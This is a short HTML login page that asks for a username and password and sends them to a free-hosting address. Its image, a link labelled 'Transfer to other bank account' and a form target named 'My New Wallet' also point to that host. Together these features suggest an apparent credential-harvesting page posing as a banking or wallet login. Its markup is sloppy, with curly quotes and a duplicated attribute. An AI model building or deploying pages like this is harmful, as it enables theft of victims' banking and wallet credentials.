<!DOCTYPE html>
<html>
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<img src="https://wekixstore.000webhostapp.com/439f31016dc1ecf9d7867cc6568e65a2.jpg" alt=”photo”alt=”photo”width="200" height="80">
<a href="https://wekixstore.000webhostapp.com/Transfer%20to%20cash%20to%20other%20bank%20account">Transfer to other bank account</a>
<style>
/*set border to the form*/
form {
border: 3px solid #f1f1f1;
}
/*assign full width inputs*/
input[type=text],
input[type=password] {
width: 98%;
padding: 12px 20px;
margin: 8px 0;
display: inline-block;
border: 1px solid #ccc;
box-sizing: border-box;
}
/*set a style for the buttons*/
button {
background-color: #4CAF50;
color: white;
padding: 14px 20px;
margin: 8px 0;
border: none;
cursor: pointer;
width: 90%;
}
/* set a hover effect for the button*/
button:hover {
opacity: 0.8;
}
/*set extra style for the cancel button*/
.cancelbtn {
width: auto;
padding: 10px 18px;
background-color: #f44336;
}
.container {
padding: 16px;
}
/*set the forgot password text*/
span.psw {
float: right;
padding-top: 16px;
}
/*set styles for span and cancel button on small screens*/
@media screen and (max-width: 300px) {
span.psw {
display: block;
float: none;
}
.cancelbtn {
width: 100%;
}
}
</style>
<body>
<h2>Login Form</h2>
<!--Step 1 : Adding HTML-->
<form action="https://wekixstore.000webhostapp.com/My%20New%20Wallet">
<div class="imgcontainer">
</div>
<div class="container">
<label><b>Username</b></label>
<input type="text" placeholder="Enter Username" name="uname" required>
<label><b>Password</b></label>
<input type="password" placeholder="Enter Password" name="psw" required>
<button type="submit">Login</button>
<input type="checkbox" checked="checked"> Remember me
</div>
<div class="container" style="background-color:#f1f1f1">
<button type="button" class="cancelbtn">Cancel</button>
<span class="psw">Forgot <a href="#">password?</a></span>
</div>
</form>
</body>
</html>